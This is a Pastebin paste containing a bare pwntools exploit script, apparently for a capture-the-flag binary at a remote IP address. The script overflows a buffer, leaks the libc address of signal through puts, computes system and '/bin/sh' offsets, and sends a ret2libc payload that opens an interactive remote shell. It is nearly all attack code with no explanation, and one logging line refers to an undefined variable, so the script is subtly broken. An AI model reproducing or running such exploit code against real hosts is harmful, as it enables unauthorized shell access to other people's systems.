Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from pwn import *
- import time
- r=remote("212.237.56.32",33334)
- time.sleep(1)
- r.recv()
- #0x08048430 <---- Return to puts
- #0x08048470 <---- return point
- #0x0804A014 <---- signal@got
- r.sendline("a"*112+p32(0x08048430)+p32(0x08048470)+p32(0x0804A014))
- time.sleep(1)
- signal=u32(r.recv(4))
- system=signal+ 0xef80
- binsh=signal+ 0x12fbeb
- log.success("SSIGNAL LEAKED: "+hex(address))
- r.sendline("a"*112+p32(system)+p32(0x08048470)+p32(binsh))
- r.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement